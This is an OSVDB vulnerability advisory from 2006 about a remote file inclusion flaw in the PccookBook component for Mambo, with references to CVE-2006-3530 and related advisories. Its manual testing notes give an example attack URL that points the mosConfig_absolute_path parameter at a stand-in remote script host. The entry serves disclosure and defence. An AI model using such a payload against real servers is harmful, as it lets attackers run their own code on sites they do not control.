PccookBook for Mambo pccookbook.php mosConfig_absolute_path Variable Remote File Inclusion

2006-07-10T04:49:12
ID OSVDB:27422
Type osvdb
Reporter OSVDB
Modified 2006-07-10T04:49:12

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://evilscript

References:

Vendor URL: http://developer.joomla.org/sf/projects/pccookbook Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,76009.0.html Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html Secunia Advisory ID:21015 Other Advisory URL: http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0111.html Keyword: ECHO_ADV_37$2006 ISS X-Force ID: 27641 Generic Exploit URL: http://www.milw0rm.com/exploits/2024 FrSIRT Advisory: ADV-2006-2739 CVE-2006-3530 Bugtraq ID: 18919